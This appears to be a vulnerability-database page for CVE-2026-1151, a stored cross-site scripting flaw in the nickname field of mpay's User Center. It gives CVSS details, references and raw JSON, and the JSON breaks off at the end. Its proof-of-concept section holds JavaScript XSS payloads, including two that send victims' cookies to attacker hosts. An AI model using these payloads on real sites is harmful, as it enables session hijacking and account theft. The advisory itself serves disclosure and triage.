Security Vulnerability Report
CVE-2026-1151 CVSS 2.4 LOW

CVE-2026-1151

Published: 2026-01-19 11:15:50
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in technical-laohu mpay up to and including version 1.2.4. The affected element is an unknown function of the User Center component. Manipulation of the Nickname argument leads to cross-site scripting. The attack can be initiated remotely. The exploit has been made publicly available and could be used for attacks.

CVSS Details

CVSS Score: 2.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

The score above is the Secondary assessment carried in the record. The raw JSON data below also carries a Primary CVSS 3.1 assessment with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 (MEDIUM), which assumes only low privileges and a changed scope; the listed weaknesses are CWE-79 and CWE-94. Triage against the higher of the two if the attacker only needs an ordinary user account to set a nickname.

Configurations (Affected Products)

cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:* - VULNERABLE
technical-laohu mpay <= 1.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2026-1151 PoC - technical-laohu mpay Nickname XSS
// This PoC demonstrates the stored XSS vulnerability in the User Center nickname field

// Malicious payload to be injected into the Nickname field
const xssPayload = '<script>alert("XSS Triggered - CVE-2026-1151")</script>';

// Attack scenario 1: Direct API submission
async function exploitViaAPI() {
  const targetURL = 'https://target-server/api/user/profile';
  const exploitData = {
    username: 'attacker_account',
    nickname: xssPayload, // Malicious XSS payload in nickname field
    email: '[email protected]',
    action: 'update_profile'
  };
  try {
    const response = await fetch(targetURL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <legitimate_token>'
      },
      body: JSON.stringify(exploitData)
    });
    console.log('Profile updated with XSS payload');
    console.log('Payload stored successfully');
  } catch (error) {
    console.error('Exploitation failed:', error);
  }
}

// Attack scenario 2: Cookie stealing payload
const cookieStealPayload = '<script>fetch("https://attacker-server/steal?c="+document.cookie)</script>';

// Attack scenario 3: Session hijacking payload
const sessionHijackPayload = '<img src=x onerror="fetch(\'https://evil.com/log?cookie=\'+document.cookie)">';

// Trigger verification
function verifyVulnerability() {
  // When victim visits profile page, XSS will execute
  console.log('XSS Payload:', xssPayload);
  console.log('Cookie Steal Payload:', cookieStealPayload);
  console.log('Exploit ready for use against mpay <= 1.2.4');
}

exploitViaAPI();
verifyVulnerability();

References

https://github.com/bdkuzma/vuln/issues/16 (Exploit, Issue Tracking, Third Party Advisory)
https://vuldb.com/?ctiid.341744 (Permissions Required, VDB Entry)
https://vuldb.com/?id.341744 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.735773

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1151", "sourceIdentifier": "[email protected]", "published": "2026-01-19T11:15:50.047", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in technical-laohu mpay up to 1.2.4. The affected element is an unknown function of the component User Center. This manipulation of the argument Nickname causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en technical-laohu mpay hasta la versión 1.2.4. El elemento afectado es una función desconocida del componente Centro de Usuarios. Esta manipulación del argumento Nickname causa cross site scripting. El ataque puede ser iniciado remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": 
false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.4", "matchCriteriaId": "C5DCECBB-D75E-42B4-89F2-76CA77FD1A51"}]}]}], "references": [{"url": "https://github.com/bdkuzma/vuln/issues/16", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341744", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341744", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735773", "source": "[email protected]", "tags": ["Thi ... (truncated)